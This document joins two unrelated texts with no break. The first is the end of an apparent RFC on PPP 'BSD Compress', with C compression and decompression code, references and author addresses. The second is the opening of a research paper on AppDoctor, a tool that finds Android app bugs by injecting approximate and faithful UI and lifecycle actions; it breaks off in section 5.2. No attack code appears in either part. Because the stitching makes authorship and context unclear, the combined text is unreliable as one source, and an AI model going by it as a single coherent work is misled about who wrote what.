            dictp = &db->dict[hval];

            /* validate and then check the entry */
            if (dictp->codem1 >= max_ent)
                goto nomatch;
            if (dictp->f.fcode == fcode) {
                ent = dictp->codem1+1;
                continue;           /* found (prefix,suffix) */
            }

            /* continue until match or invalid entry */
            disp = (hval == 0) ? 1 : hval;
            do {
                hval += disp;
                if (hval >= db->hsize)
                    hval -= db->hsize;
                dictp = &db->dict[hval];
                if (dictp->codem1 >= max_ent)
                    goto nomatch;
            } while (dictp->f.fcode != fcode);
            ent = dictp->codem1+1;
            continue;               /* found (prefix,suffix) */

        nomatch:
            bitno += n_bits;        /* output (count) the prefix */

            /* code -> hashtable */
            if (max_ent < db->maxmaxcode) {
                struct bsd_dict *dictp2;

                /* expand code size if needed */
                if (max_ent >= MAXCODE(n_bits))
                    db->n_bits = ++n_bits;

                /* Invalidate previous hash table entry
                 * assigned this code, and then take it over.
                 */
                dictp2 = &db->dict[max_ent+1];
                if (db->dict[dictp2->cptr].codem1 == max_ent)
                    db->dict[dictp2->cptr].codem1 = BADCODEM1;
                dictp2->cptr = hval;
                dictp->codem1 = max_ent;
                dictp->f.fcode = fcode;
                db->max_ent = ++max_ent;
                db->lens[max_ent] = db->lens[ent]+1;
            }
            ent = c;
        } while (--slen != 0);
    }
    bitno += n_bits;                /* output (count) last code */
    db->bytes_out += bitno/8;
    (void) pf_bsd_check(db);

    /* Increase code size if we would have without the packet
     * boundary and as the decompressor will.
     */
    if (max_ent >= MAXCODE(n_bits) && max_ent < db->maxmaxcode)
        db->n_bits++;
}

/* Decompress "BSD Compress" */
mblk_t*                             /* 0=failed, so zap CCP */
pf_bsd_decomp(struct bsd_db *db,
              mblk_t *cmsg)
{
    register u_int max_ent = db->max_ent;
    register __uint32_t accum = 0;
    register u_int bitno = 32;      /* 1st valid bit in accum */
    register u_int n_bits = db->n_bits;
    register u_int tgtbitno = 32-n_bits;    /* bitno when accum is full */
    register struct bsd_dict *dictp;
    register int explen, i;
    register u_int incode, oldcode, finchar;
    register u_char *p, *rptr, *rptr9, *wptr0, *wptr;
    mblk_t *dmsg, *dmsg1, *bp;

    db->decomp_count++;

    rptr = cmsg->b_rptr;
    ASSERT(cmsg->b_wptr >= rptr+PPP_BUF_MIN);
    ASSERT(PPP_BUF_ALIGN(rptr));
    rptr += PPP_BUF_MIN;

    /* get the sequence number */
    i = 0;
    explen = 2;
    do {
        while (rptr >= cmsg->b_wptr) {
            bp = cmsg;
            cmsg = cmsg->b_cont;
            freeb(bp);
            if (!cmsg) {
                if (db->debug)
                    printf("bsd_decomp%d: missing %d header bytes\n",
                           db->unit, explen);
                return 0;
            }
            rptr = cmsg->b_rptr;
        }
        i = (i << 8) + *rptr++;
    } while (--explen != 0);
    if (i != db->seqno++) {
        freemsg(cmsg);
        if (db->debug)
            printf("bsd_decomp%d: bad sequence number 0x%x"
                   " instead of 0x%x\n",
                   db->unit, i, db->seqno-1);
        return 0;
    }

    /* Guess how much memory we will need.  Assume this packet was
     * compressed by at least 1.5X regardless of the recent ratio.
     */
    if (db->ratio > (RATIO_SCALE*3)/2)
        explen = (msgdsize(cmsg)*db->ratio)/RATIO_SCALE;
    else
        explen = (msgdsize(cmsg)*3)/2;
    if (explen > db->mru)
        explen = db->mru;
    dmsg = dmsg1 = allocb(explen+PPP_BUF_HEAD_INFO, BPRI_HI);
    if (!dmsg1) {
        freemsg(cmsg);
        return 0;
    }
    wptr = dmsg1->b_wptr;
    ((struct ppp_buf*)wptr)->type = BEEP_FRAME;
    /* the protocol field must be compressed */
    ((struct ppp_buf*)wptr)->proto = 0;
    wptr += PPP_BUF_HEAD_PROTO+1;

    rptr9 = cmsg->b_wptr;
    db->bytes_out += rptr9-rptr;
    wptr0 = wptr;
    explen = dmsg1->b_datap->db_lim - wptr;
    oldcode = CLEAR;
    for (;;) {
        if (rptr >= rptr9) {
            bp = cmsg;
            cmsg = cmsg->b_cont;
            freeb(bp);
            if (!cmsg)              /* quit at end of message */
                break;
            rptr = cmsg->b_rptr;
            rptr9 = cmsg->b_wptr;
            db->bytes_out += rptr9-rptr;
            continue;               /* handle 0-length buffers */
        }

        /* Accumulate bytes until we have a complete code.
         * Then get the next code, relying on the 32-bit,
         * unsigned accum to mask the result.
         */
        bitno -= 8;
        accum |= *rptr++ << bitno;
        if (tgtbitno < bitno)
            continue;
        incode = accum >> tgtbitno;
        accum <<= n_bits;
        bitno += n_bits;

        if (incode == CLEAR) {
            /* The dictionary must only be cleared at the end of a
             * packet.  But there could be an empty message block
             * at the end.
             */
            if (rptr != rptr9 || cmsg->b_cont != 0) {
                cmsg->b_rptr = rptr;
                i = msgdsize(cmsg);
                if (i != 0) {
                    freemsg(dmsg);
                    freemsg(cmsg);
                    if (db->debug)
                        printf("bsd_decomp%d: bad CLEAR\n", db->unit);
                    return 0;
                }
            }
            pf_bsd_clear(db);
            freemsg(cmsg);
            wptr0 = wptr;
            break;
        }

        /* Special case for KwKwK string. */
        if (incode > max_ent) {
            if (incode > max_ent+2
                || incode > db->maxmaxcode
                || oldcode == CLEAR) {
                freemsg(dmsg);
                freemsg(cmsg);
                if (db->debug)
                    printf("bsd_decomp%d: bad code %x\n",
                           db->unit, incode);
                return 0;
            }
            i = db->lens[oldcode];
            /* do not write past end of buf */
            explen -= i+1;
            if (explen < 0) {
                db->undershoot -= explen;
                db->in_count += wptr-wptr0;
                dmsg1->b_wptr = wptr;
                CK_WPTR(dmsg1);
                explen = MAX(64, i+1);
                bp = allocb(explen, BPRI_HI);
                if (!bp) {
                    freemsg(cmsg);
                    freemsg(dmsg);
                    return 0;
                }
                dmsg1->b_cont = bp;
                dmsg1 = bp;
                wptr0 = wptr = dmsg1->b_wptr;
                explen = dmsg1->b_datap->db_lim - wptr - (i+1);
            }
            p = (wptr += i);
            *wptr++ = finchar;
            finchar = oldcode;
        } else {
            i = db->lens[finchar = incode];
            explen -= i;
            if (explen < 0) {
                db->undershoot -= explen;
                db->in_count += wptr-wptr0;
                dmsg1->b_wptr = wptr;
                CK_WPTR(dmsg1);
                explen = MAX(64, i);
                bp = allocb(explen, BPRI_HI);
                if (!bp) {
                    freemsg(dmsg);
                    freemsg(cmsg);
                    return 0;
                }
                dmsg1->b_cont = bp;
                dmsg1 = bp;
                wptr0 = wptr = dmsg1->b_wptr;
                explen = dmsg1->b_datap->db_lim - wptr - i;
            }
            p = (wptr += i);
        }

        /* decode code and install in decompressed buffer */
        while (finchar > LAST) {
            dictp = &db->dict[db->dict[finchar].cptr];
            *--p = dictp->f.hs.suffix;
            finchar = dictp->f.hs.prefix;
        }
        *--p = finchar;

        /* If not the first code in a packet, and if not out of code
         * space, then allocate a new code.  Keep the hash table
         * correct so it can be used with uncompressed packets.
         */
        if (oldcode != CLEAR && max_ent < db->maxmaxcode) {
            struct bsd_dict *dictp2;
            __uint32_t fcode;
            int hval, disp;

            fcode = BSD_KEY(oldcode, finchar);
            hval = BSD_HASH(oldcode, finchar, db->hshift);
            dictp = &db->dict[hval];

            /* look for a free hash table entry */
            if (dictp->codem1 < max_ent) {
                disp = (hval == 0) ? 1 : hval;
                do {
                    hval += disp;
                    if (hval >= db->hsize)
                        hval -= db->hsize;
                    dictp = &db->dict[hval];
                } while (dictp->codem1 < max_ent);
            }

            /* Invalidate previous hash table entry
             * assigned this code, and then take it over.
             */
            dictp2 = &db->dict[max_ent+1];
            if (db->dict[dictp2->cptr].codem1 == max_ent) {
                db->dict[dictp2->cptr].codem1 = BADCODEM1;
            }
            dictp2->cptr = hval;
            dictp->codem1 = max_ent;
            dictp->f.fcode = fcode;
            db->max_ent = ++max_ent;
            db->lens[max_ent] = db->lens[oldcode]+1;

            /* Expand code size if needed. */
            if (max_ent >= MAXCODE(n_bits)
                && max_ent < db->maxmaxcode) {
                db->n_bits = ++n_bits;
                tgtbitno = 32-n_bits;
            }
        }
        oldcode = incode;
    }
    db->in_count += wptr-wptr0;
    dmsg1->b_wptr = wptr;
    CK_WPTR(dmsg1);
    db->overshoot += explen;

    /* Keep the checkpoint right so that incompressible packets
     * clear the dictionary at the right times.
     */
    if (pf_bsd_check(db) && db->debug) {
        printf("bsd_decomp%d: peer should have cleared dictionary\n",
               db->unit);
    }

    return dmsg;
}
```

Security Considerations

   Security issues are not discussed in this memo.

References

   [1] Simpson, W., Editor, "The Point-to-Point Protocol (PPP)", STD 51, RFC 1661, July 1994.

   [2] Rand, D., "The PPP Compression Control Protocol (CCP)", RFC 1962, June 1996.

Acknowledgments

   William Simpson provided and supported the very valuable idea of not using any additional header bytes for incompressible packets.

Chair's Address

   The working group can be contacted via the current chair:

   Karl Fox
   Ascend Communications
   3518 Riverside Drive, Suite 101
   Columbus, Ohio 43221

   EMail: karl@ascend.com

Author's Address

   Questions about this memo can also be directed to:

   Vernon Schryver
   2482 Lee Hill Drive
   Boulder, Colorado 80302

   EMail: vjs@rhyolite.com
Efficiently, Effectively Detecting Mobile App Bugs with AppDoctor

Gang Hu, Xinhao Yuan, Yang Tang, Junfeng Yang
Columbia University
{ganghu,xinhaoyuan,ty,junfeng}@cs.columbia.edu

Abstract

Mobile apps bring unprecedented levels of convenience, yet they are often buggy, and their bugs offset the convenience the apps bring. A key reason for buggy apps is that they must handle a vast variety of system and user actions, such as being randomly killed by the OS to save resources, but app developers, facing tough competition, lack time to thoroughly test these actions. AppDoctor is a system for efficiently and effectively testing apps against many system and user actions, and helping developers diagnose the resultant bug reports. It quickly screens for potential bugs using approximate execution, which runs much faster than real execution and exposes bugs but may cause false positives. From the reports, AppDoctor automatically verifies most bugs and prunes most false positives, greatly saving manual inspection effort. It uses action slicing to further speed up bug diagnosis. We implement AppDoctor in Android. It operates as a cloud of physical devices or emulators to scale up testing. Evaluation on 53 out of the 100 most popular apps in Google Play and 11 of the most popular open-source apps shows that AppDoctor effectively detects 72 bugs—including two bugs in the Android framework that affect all apps—with quick checking sessions, speeds up testing by 13.3 times, and vastly reduces diagnosis effort.

1. Introduction

Mobile apps are a crucial part of the widely booming mobile ecosystems. These apps absorb many innovations and greatly improve our lives. They help users check emails, search the web, social-network, process documents, edit pictures, access (sometimes classified [16]) data, etc.
Given the unprecedented levels of convenience and rich functionality of apps, it is unsurprising that Google Play [24], the app store of Android, alone has over 1M apps with tens of billions of downloads [5]. Unfortunately, as evident from the large number of negative comments in Google Play, apps are frequently buggy, and the bugs offset the convenience the apps bring.

A key reason for buggy apps is that they must correctly handle a vast variety of system and user actions. For instance, an app may be switched to background and killed by a mobile OS such as Android at any moment, regardless of what state the app is in. Yet, when the user reruns the app, it must still restore its state and proceed as if no interruption ever occurred. Unlike most traditional OSes, which support generic swapping of processes, a mobile OS can kill apps running in the background to save battery and memory, while letting them back up and restore their own states. App developers must now correctly handle all possible system actions that may pause, stop, and kill their apps—the so-called lifecycle events in Android—at all possible moments, a very challenging problem. On top of these system actions, users can also trigger arbitrary UI actions available on the current UI screen. Unexpected user actions also cause various problems, such as security exploits that bypass screen locks [11, 50].

Testing these actions takes much time. Testing them over many device configurations (e.g., screen sizes), OS versions, and vendor customizations takes even more time. Yet, many apps are written by indie developers or small studios with limited time and resource budgets. Facing tough competition, developers often release apps under intense time-to-market pressure. Unsurprisingly, apps are often under-tested and react oddly to unexpected actions, seriously degrading user experience [31].
We present AppDoctor, a system for efficiently and effectively testing apps against many system and user actions, and helping developers diagnose the resultant bug reports. It gains efficiency using two ideas. First, it uses approximate execution to greatly speed up testing and reduce diagnosis effort. Specifically, it quickly screens for potential bugs by performing actions in approximate mode—which runs much faster than actions in faithful mode and can expose bugs but allows false positives (FPs). For example,
instead of waiting for more than two seconds to inject a long-click action on a GUI widget, AppDoctor simply invokes the widget’s long-click event handler. Invoking the handler is much faster but allows FPs because the handler may not be invoked at all even if a user long-clicks on the widget—the app’s GUI event dispatch logic may ignore the event or send the event to other widgets. Given a set of bug reports detected through approximate executions, AppDoctor reduces the FPs caused by approximation as follows. Based on the traces of actions in bug reports, AppDoctor automatically validates most bugs by generating testcases of low-level events such as key presses and screen touches (e.g., a real long click). These testcases can be used by developers to reproduce the bugs independently without AppDoctor. Moreover, AppDoctor automatically prunes most FPs with a new algorithm that selectively switches between approximate and faithful executions. By coupling these two modes of executions, AppDoctor solves a number of problems of prior approaches which either require much manual effort to inspect bug reports or are too slow. Approximate execution is essentially a “bloom filter” approach to bug detection: it leverages approximation for speed, and validates results with real executions. Like prior work [14, 15], it generates testcases to help developers independently reproduce bugs. Unlike prior work, it generates event testcases and aggressively embraces approximation. Second, AppDoctor uses action slicing to speed up reproducing and diagnosing app bugs. The trace leading to a bug often contains many actions. A long testcase makes it slow to reproduce a bug and isolate the cause. Fortunately, many actions in the trace are not relevant to the bug, and can be sliced out from the trace. However, doing so either requires precise action dependencies or is slow. 
To solve this problem, AppDoctor again embraces approximation, and employs a novel algorithm and action dependency definition to effectively slice out many unnecessary actions with high speed.

We explicitly designed AppDoctor as a dynamic tool (i.e., it runs code) so that it can find many bugs while emitting few or no FPs. We did not design AppDoctor to catch all bugs (i.e., it has false negatives). An alternative is static analysis, but a static tool is likely to have difficulties understanding the asynchronous, implicit control flow due to GUI event dispatch. Moreover, a static tool cannot easily generate low-level event testcases for validating bugs. AppDoctor does not use symbolic execution because symbolic execution is typically neither scalable nor designed to catch bugs triggered by GUI event sequences. As a result, the bugs AppDoctor finds are often different from those found by static analysis or symbolic execution.

We implement AppDoctor in Android, the most popular mobile platform today. It operates as a cloud of mobile devices or emulators to further scale up testing, and supports many device configurations and Android OS versions. To inject actions, it leverages Android's instrumentation framework [3], avoiding modifications to the OS and simplifying deployment.

Evaluation on 53 of the top 100 apps in Google Play and 11 of the most popular open-source apps shows that AppDoctor effectively detected 72 bugs in apps with tens of millions of users, built by reputable companies such as Google and Facebook; it even found two bugs in the Android framework that affect all apps; its approximate execution speeds up testing by 13.3 times; out of the 64 reports generated from one quick checking session, it verified 43 bugs and pruned 16 FPs automatically, leaving only 5 reports for developer inspection; and its action slicing technique reduced the average trace length by a factor of 4, further simplifying diagnosis.

The next section gives background.
§3 describes two examples to illustrate AppDoctor's advantages over prior approaches. §4 presents an overview of AppDoctor, §5 approximate execution, §6 action slicing, and §7 implementation. §8 shows the results. §9 discusses limitations, and §10 related work. §11 concludes.

### 2. Background

In Android, an app organizes its logic into activities, each representing a single screen of UI. For instance, an email app may have an activity for user login, another for listing emails, another for reading an email, and yet another for composing an email. The number of activities varies greatly between apps, from a few to more than two hundred, depending on an app's functionality. All activities run within the main thread of the app.

An activity contains widgets users interact with. Android provides a set of standard widgets [4], such as buttons, text boxes, seek bars (a slider for users to select a value from a range of values), switches (for users to select options), and number pickers (for users to select a value from a set of values by touching buttons or swiping a touch screen). Widgets handle a standard set of UI actions, such as clicks (press and release a widget), long-clicks (press, hold, and release a widget), typing text into text boxes, sliding seek bars, and toggling switches.

Users interact with widgets by triggering low-level events, including touch events (users touching the device's screen) and key events (users pressing or releasing keys). Android OS and apps work together to compose the low-level events into actions and dispatch the actions to the correct widgets. This dispatch can get quite complex because developers can customize widgets in many different ways. For instance, they can override the low-level event handlers to compose the events into non-standard actions or forward events to other widgets for handling. Moreover, they can create GUI layouts with one widget covering another at runtime, so the widget on top receives the actions.
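To make this dispatch complexity concrete, the following is a minimal Python model (illustrative only; the widget names, the `dispatch` rule, and the forwarding logic are our simplifications, not Android's API) of how a covering widget can swallow or forward events, so that a widget whose handler is perfectly invokable may never receive a real click:

```python
# Toy model of GUI event dispatch: the OS delivers an event to the topmost
# widget covering the touch point; that widget may consume or forward it.
# Purely illustrative -- real Android dispatch is far more involved.

class Widget:
    def __init__(self, name, forward_to=None):
        self.name = name
        self.forward_to = forward_to  # optional widget to forward events to
        self.clicks = 0

    def on_click(self):
        # The handler a testing tool could invoke directly.
        self.clicks += 1

    def dispatch(self, event):
        if self.forward_to is not None:
            self.forward_to.dispatch(event)  # custom forwarding logic
        else:
            self.on_click()                  # consume the event itself

def send_click(widgets_top_to_bottom):
    """The 'OS' sends the event to the topmost widget only."""
    widgets_top_to_bottom[0].dispatch("click")

button = Widget("button")
overlay = Widget("overlay")        # covers the button and swallows events
send_click([overlay, button])
assert button.clicks == 0          # a real user click never reaches the button

button.on_click()                  # yet its handler is still invokable
assert button.clicks == 1
```

This gap between "handler is invokable" and "user can actually trigger it" is exactly what later makes approximate handler invocation prone to FPs (§3, §5).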
Users also interact with an activity through three special keys of Android. The Back key typically causes Android to go back to the previous activity or undo a previous action. The Menu key typically pops up a menu widget listing actions that can be done within the current activity. The Search key typically starts a search in the current app. These keys present a standard, familiar interface for Android users.

Besides user actions, an activity handles a set of system actions called the lifecycle events [1]; Figure 1 shows these events and the names of their event handlers. Android uses these events to inform an activity about status changes, including when (1) the activity is created (onCreate), (2) it becomes visible to the user but may be partially covered by another activity (onStart and onRestart), (3) it becomes the app running in the foreground and receives user actions (onResume), (4) it is covered by another activity but may still be visible (onPause), (5) it is switched to the background (onStop), and (6) it is destroyed (onDestroy). Android dispatches lifecycle events to an activity for many purposes. For instance, an activity may want to read data from a file and fill the content into widgets when it is first created. More crucially, these events give an activity a chance to save its state before Android kills it.

User actions, lifecycle events, and their interplay can be arbitrary and complex. According to our bug results, many popular apps and even the Android framework sometimes fail to handle them correctly.

### 3. Examples

This section describes two examples to illustrate the advantages of AppDoctor over prior approaches. The first example is an Android GUI framework bug AppDoctor automatically found and verified, and the second example is an FP AppDoctor automatically pruned.

**Bug example.** This bug is in Android's code for handling an app's request of a service.
For instance, when an app attempts to send a text message and asks the user to choose a text message app, the app calls Android's createChooser method. Android then displays a dialog containing a list of apps. When there is no app for sending text messages, the dialog is empty. If at this moment the user switches the app to the background, waits until Android saves the app's state and stops the app, and then switches the app back to the foreground, the app crashes trying to dereference null.

One approach to finding app bugs is to inject low-level events such as touch and key events using tools such as Monkey [47] and MonkeyRunner [40]. This approach typically has no FPs because the injected events are as real as what users may trigger. It is also simple, requiring little infrastructure to reproduce bugs, and the infrastructure is often already installed as part of Android. Thus, diagnosing bugs detected with this approach is easy. However, this approach is quite slow because some low-level events take a long time to inject. Specifically for this bug, this approach needs time at three places. First, to detect this bug, it must wait for a sufficiently long period of time for Android to save the app state and stop the app. In our experiments, this wait is at least 5 seconds. Second, this approach does not know when the app has finished processing an event, so it has to conservatively wait for some time after each event until the app is ready for the next event. This wait is at least 6 seconds. Third, without knowing what actions it can perform, it typically blindly injects many redundant events (e.g., clicks at different points within the same button, which cause the same action), while missing critical ones (e.g., stopping the app while the dialog is displayed in this bug).

AppDoctor solves all three problems. It approximates the effects of the app stop and start by directly calling the app's lifecycle event handlers, running much faster and avoiding the long wait.
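This lifecycle approximation can be illustrated with a small Python model (not Android code; the activity, its state, and the handler names merely mirror the lifecycle events of §2). An approximate StopStart simply calls the handlers back-to-back with no real wait, yet still exposes a save/restore bug of the kind in the chooser example:

```python
# Illustrative model of approximating StopStart by calling lifecycle
# handlers directly instead of really backgrounding the app for seconds.

class ChooserActivity:
    def __init__(self, apps):
        self.apps = apps          # list shown in the chooser dialog
        self.saved = None

    # Lifecycle handlers, in the order Android calls them for StopStart.
    def on_pause(self): pass
    def on_save_instance_state(self):
        # Buggy: saves None when the list is empty (cf. the chooser bug).
        self.saved = {"apps": self.apps} if self.apps else None
    def on_stop(self):
        self.apps = None          # state is destroyed with the activity
    def on_restart(self): pass
    def on_start(self):
        self.apps = self.saved["apps"]   # crashes if saved is None
    def on_resume(self): pass

def approx_stop_start(activity):
    """Approximate mode: invoke the handlers back-to-back, no real wait."""
    for h in (activity.on_pause, activity.on_save_instance_state,
              activity.on_stop, activity.on_restart,
              activity.on_start, activity.on_resume):
        h()

act = ChooserActivity(apps=[])    # empty chooser, as in the real bug
try:
    approx_stop_start(act)
    crashed = False
except TypeError:                 # subscripting None raises TypeError here
    crashed = True
assert crashed
```

The same handler sequence, performed faithfully, requires backgrounding the app and waiting for the OS, which is where the multi-second delays above come from.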
It detects when an action is done, and immediately performs the next action. It also understands what actions are available, avoiding much redundant work. It detected this bug when checking the popular app Craigslist and a number of other apps. (To avoid inflating our bug count, we counted all these reports as one bug in our evaluation in §8.1.) This bug was previously unknown to us. It was recently fixed in the Android repository. AppDoctor not only found this bug fast, but also generated an event testcase that can reliably reproduce the problem on "clean" devices that do not have AppDoctor installed, providing the same level of diagnosis help to developers as Monkey.

**FP example.** Another approach to testing apps is to drive app executions by directly calling the app's event handlers (e.g., by calling the handler of long-click without doing a real long-click) or mutating an app's data (e.g., by setting the contents of a text box directly). A closed-source tool, AppCrawler [7], appears to do so. However, this approach suffers from FPs because the actions it injects are approximate and may never occur in real executions. A significant possibility of FPs means that developers must inspect the bug reports, requiring much manual effort.

To illustrate why this approach has FPs, we describe an FP AppDoctor encountered and automatically pruned. This FP is in the MyCalendar app, which has a text box for users to input their birth month. It customizes this text box by allowing users to select the name of a month only using a number picker it displays, ensuring that the text box's content can only be the name of one of the 12 months. When AppDoctor checked this app with approximate actions, it found an execution that led to an IndexOutOfBoundsException. Specifically, it found that this text box was marked as editable, so it set the text to "test," a value users can never possibly set, causing the crash.
Tools that directly call event handlers or set app data will suffer from this FP. Because of the significant possibility of FPs (25% in our experiments; see §8), users must inspect these tools' reports, a labor-intensive, error-prone process. Fortunately, by coupling approximate and faithful executions, AppDoctor automatically prunes this FP. Specifically, for each bug report detected by performing actions in approximate mode, AppDoctor validates it by performing the actions again in faithful mode. For this example, AppDoctor attempted to set the text by issuing low-level touch and key events. It could not trigger the crash again because the app correctly validated the input, so it automatically classified the report as an FP.

App input validation is just one of the reasons for FPs. Another is the complex event dispatch logic in Android and apps. A widget may claim that it is visible and its event handlers are invokable, but in a real execution a user may never be able to trigger the handlers. For instance, one GUI widget W1 may be covered by another W2, so the OS does not invoke W1's handlers to process user clicks. However, AppDoctor cannot rule out W1 because visibility is only part of the story, and W2 may actually forward the events to W1. Precisely determining whether an event handler can be triggered by users may require manually deciphering the complex event dispatch logic of the OS and the app. AppDoctor's coupling of approximate and faithful executions solves all these problems at once.

### 4. Overview

This section gives an overview of AppDoctor. Figure 2 shows its workflow. Given an app, AppDoctor explores possible executions of the app on a cloud of physical devices and emulator instances by repeatedly injecting actions. This exploration can use a variety of search algorithms and heuristics to select the actions to inject (§7.4). To quickly screen for potential bugs, AppDoctor performs actions in approximate mode during exploration (§5.2).
For each potential bug detected, it emits a report containing the failure caused by the bug and the trace of actions leading to the failure. Once AppDoctor collects a set of bug reports, it runs automated diagnosis to classify reports into bugs and FPs by replaying each trace several times in approximate, faithful, and mixed modes (§5.3). It can afford to replay several times because the number of bug reports is much smaller than the number of checking executions. It also applies action slicing to reduce trace lengths, further simplifying diagnosis (§6). It outputs (1) a set of auto-verified bugs accompanied by testcases that can reproduce the bugs on clean devices independent of AppDoctor, (2) a set of auto-pruned FPs so developers need not inspect them, and (3) a small number of reports marked as likely bugs or FPs with detailed traces for developer inspection.

AppDoctor focuses on bugs that may cause crashes. It targets apps that use standard widgets and support standard actions. We leave it for future work to support custom checkers (e.g., a checker that verifies the consistency of app data), widgets, and actions. AppDoctor automatically generates typical inputs for the actions it supports (e.g., the text in a text box; see §7.6), but it may not find bugs that require a specific input. These as well as other limitations may lead to false negatives (see §9).

### 5. Approximate Execution

This section presents AppDoctor's approximate execution technique. We start by introducing the actions AppDoctor supports (§5.1), and then discuss the explore stage (§5.2) and the diagnosis stage (§5.3).

#### 5.1 Actions

AppDoctor supports 20 actions, split into three classes. The 7 actions in the first class run much faster in approximate mode than in faithful mode. The 5 actions in the second class run identically in approximate and faithful modes. The 8 actions in the last class have only approximate modes. We start with the first class.
The first 4 actions in this class are GUI events on an app's GUI widgets, and the other 3 are lifecycle events. For each action, we provide a general description, how AppDoctor performs it in approximate mode, how AppDoctor performs it in faithful mode, and the main reason for FPs.

**LongClick.** A user presses a GUI widget for longer than 2 seconds. In approximate mode, AppDoctor calls the widget's event handler by calling widget.performLongClick. In faithful mode, AppDoctor sends a touch event Down to the widget, waits for 3 seconds, and then sends a touch event Up. The main reason for FPs is that, depending on the event dispatch logic in Android OS and the app (§2), the touch events may not be sent to the widget, so the LongClick handler of the widget is not invoked in a real execution. A frequent scenario is that the widget is covered by another widget, so the widget on top intercepts all events.

**SetEditText.** A user sets the text of a text box. In approximate mode, AppDoctor directly sets the text by calling the widget's method `setText`. In faithful mode, AppDoctor sends a series of low-level events to the text box to set the text. Specifically, it sends a touch event to set the focus to the text box, Backspace and Delete keys to erase the old text, and other keys to type the text. The main reason for FPs is that developers can customize a text box to allow only certain text to be set. For instance, they can validate the text or override the widget's touch event handler to display a list of texts for a user to select.

**SetNumberPicker.** A user sets the value of a number picker. In approximate mode, AppDoctor directly sets the value by calling the widget's method `setValue`. In faithful mode, AppDoctor sends a series of touch events to press the buttons inside the number picker to gradually adjust its value. The main reason for FPs is similar to that of SetEditText: developers may allow only certain values to be set.
**ListSelect.** A user scrolls a list widget and selects an item in the list. In approximate mode, AppDoctor calls the widget's `setSelection` to make the item show up on the screen and select it. In faithful mode, AppDoctor sends a series of touch events to scroll the list until the given item shows up. The main reason for FPs is that developers can customize the list widget and limit the range of the list visible to a user.

**PauseResume.** A user switches an app to the background (e.g., by running another app) for a short period of time, and then switches the app back (see lifecycle events in §2). Android OS pauses the app when the switch happens, and resumes it after the app is switched back. In approximate mode, AppDoctor calls the foreground activity's event handlers `onPause` and `onResume` to emulate this action. In faithful mode, AppDoctor starts another app (currently Android's Settings app for configuring system-wide parameters), waits for 1 second, and switches back. The main reason for FPs is that developers can alter the event handlers called to handle lifecycle events.

**StopStart.** This action is more involved than PauseResume. It occurs when a user switches an app to the background for a longer period of time, and then switches it back. Since the app stays in the background for long, Android OS saves the app's state and destroys the app to save memory. Android later restores the app's state when the app is switched back. In approximate mode, AppDoctor calls the following event handlers of the current activity: `onPause`, `onSaveInstanceState`, `onStop`, `onRestart`, `onStart`, and `onResume`. In faithful mode, AppDoctor starts another app, waits for 10 seconds, and switches back. The main reason for FPs is that developers can alter the event handlers called to handle lifecycle events.

**Relaunch.** This action is even more involved than StopStart.
It occurs when a user introduces configuration changes that cause the current activity to be destroyed and recreated. For instance, a user may rotate her device (causing the activity to be destroyed) and rotate it back (causing the activity to be recreated). In approximate mode, AppDoctor calls Android OS's `recreate` to destroy and recreate the activity. In faithful mode, AppDoctor injects low-level events to rotate the device's orientation twice. The main reason for FPs is that apps may register custom event handlers to handle relaunch-related events, so the activities are not really destroyed and recreated.

All 7 actions in the first class run much faster in approximate mode than in faithful mode, so AppDoctor runs them in approximate mode during exploration.

AppDoctor supports a second class of 5 actions for which invoking their handlers is as fast as sending low-level events. Thus, AppDoctor injects low-level events for these actions in both approximate and faithful modes.

**Click.** A user quickly taps a GUI widget. In both modes, AppDoctor sends a pair of touch events, Down and Up, to the center of the widget.

**KeyPress.** A user presses a key on the phone, such as the Back key or the Search key. AppDoctor sends a pair of key events, Down and Up, with the corresponding key code to the app. This action sends only special keys because standard text input is handled by `SetEditText`.

**MoveSeekBar.** A user changes the value of a seek bar widget. In both modes, AppDoctor calculates the physical position on the widget that corresponds to the value the user is setting, and sends a pair of touch events, Down and Up, at that position to the widget.

**Rotate.** A user changes the orientation of the device. AppDoctor sends a series of low-level events to rotate the device's orientation.

AppDoctor supports a third class of 8 actions caused by external events in the execution environment of an app, such as the disconnection of the wireless network.
AppDoctor injects them by sending emulated low-level events to an app, instead of, for example, disconnecting the network for real. We discuss three example actions below.

**Intent.** An app may run an activity in response to a request from another app. These requests are called `intents` in Android. Currently AppDoctor injects all intents that an app declares to handle, such as viewing data, searching for media files, and getting data from a database.

**Network.** AppDoctor injects network connectivity change events, such as the change from wireless to 3G and from connected to disconnected.

**Storage.** AppDoctor injects storage-related events such as the insertion or removal of an SD card.

```java
appdoctor.explore_once() { // returns a bug trace
    trace = [];
    appdoctor.reset_init_state();
    while (app not exit and action limit not reached) {
        action_list = appdoctor.collect();
        action = appdoctor.choose(action_list);
        appdoctor.perform(action, APPROX);
        trace.append(action);
        if (failure found)
            return trace;
    }
}
```
Figure 3: Algorithm to explore one execution for bugs.

#### 5.2 Explore

When AppDoctor explores app executions for bugs, it runs the actions described in the previous subsection in approximate mode for speed. Figure 3 shows AppDoctor's algorithm to explore one execution of an app for bugs. It sets the initial state of the app, then repeatedly collects the actions that can be done, chooses one action, performs the action in approximate mode, and checks for bugs. If a failure such as an app crash occurs, it returns a trace of the actions leading to the failure. To explore more executions, AppDoctor runs this algorithm repeatedly. It collects available actions by traversing the GUI hierarchy of the current activity, leveraging the Android instrumentation framework (§7.1). AppDoctor then chooses one of the actions to inject.
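Figure 3's loop can be fleshed out as a runnable Python sketch; the toy app, its actions, and the failure signal are stand-ins for AppDoctor's real instrumentation interfaces:

```python
# Runnable sketch of Figure 3's exploration loop. The app model and the
# action names are stand-ins for AppDoctor's real instrumentation hooks.

class ToyApp:
    """A toy 'app': performing the 'crash' action makes it fail."""
    def __init__(self):
        self.failed = False
    def reset(self):
        self.failed = False
    def collect(self):
        return ["menu", "back", "crash"]     # actions on the current screen
    def perform(self, action, mode="APPROX"):
        if action == "crash":
            self.failed = True

def explore_once(app, choose, action_limit=100):
    """Returns a trace of actions leading to a failure, or None."""
    trace = []
    app.reset()
    while not app.failed and len(trace) < action_limit:
        action = choose(app.collect())
        app.perform(action, mode="APPROX")   # approximate mode for speed
        trace.append(action)
        if app.failed:
            return trace
    return None

# A trivial deterministic chooser; the exploration methods of §7.4 plug
# different chooser functions into the same loop.
trace = explore_once(ToyApp(), choose=lambda actions: actions[-1])
assert trace == ["crash"]
```

The `choose` parameter is the single point of configurability the next paragraph describes: swapping it changes the search heuristic without touching the loop.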
By configuring how to choose actions, AppDoctor can implement different search heuristics such as depth-first search, breadth-first search, priority search, and random walk (§7.4). AppDoctor performs each action as soon as the previous action is done, further improving speed (§7.5).

